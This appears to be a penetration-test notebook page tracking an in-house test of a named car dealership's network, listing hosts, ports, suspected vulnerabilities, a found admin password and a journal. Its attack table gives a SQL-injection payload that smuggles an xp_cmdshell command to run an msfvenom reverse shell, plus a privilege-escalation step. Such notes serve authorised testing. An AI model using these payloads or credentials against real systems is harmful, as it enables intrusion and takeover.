πŸ”

Murray Chev Pentest

✏️ Overview

πŸ—’οΈ
Name

Murray Chevrolet Cadillac
πŸ“…
Time Frame

ongoing
🎯
Goal

Full system enumeration and vulntest
πŸ“

Description

This is the first in house pentest for Murray Chevrolet Cadillac to not only put into place what I have learned but to also better document the network.

πŸ–₯️ Machines

NameIPIs PwnedIs in domainHas AVHas FWOperating SystemObservationsSuccessful Attack VectorOpen PortsAdditional Notes
Alpha-192.168.1.101β›”βœ…β›”βœ…Windows 10SMB Vulnerability, RDP Brute Force135, 445, 3389SMB seems vulnerable to EternalBlue
Beta-Server192.168.1.102βœ…β›”βœ…βœ…Ubuntu 18.04SSH Weak Credentials, Exposed FTPSSH using found credentials22, 21, 80Credentials found in previous breach dump
Gamma-Box192.168.1.103β›”β›”β›”β›”CentOS 7Outdated Apache Server, Misconfigured sudo80

β˜‘οΈ Findings

β˜‘οΈ Attacks & Payloads

MachineAttack VectorPrerequisitesPayloadAdditional Notes
Alpha-NodeSQLi on /loginmsfvenom -p windows/shell_reverse_tcp

download payload, store in temp, run it
ProductID=1';EXEC master.dbo.xp_cmdshell "powershell C:\windows\temp\reverse.exe"; β€”use GodPotato to escalate privileges to nt authority\system

πŸ‘₯Β Credentials

UsernameHashPasswordIs domain userPurposeAdditional Notes
adpassword123βœ…Admin login for Gamma-BoxCommon password, easily guessed.

πŸ“˜ Reports

πŸ“˜ Journal

TimestampMachineNote
12:34Beta-ServerFound common credentials using a previously known breach database. Gained SSH access.
12:17 Jan27/25Nmap scanFull nmap scan with β€”script smb-enum-shares.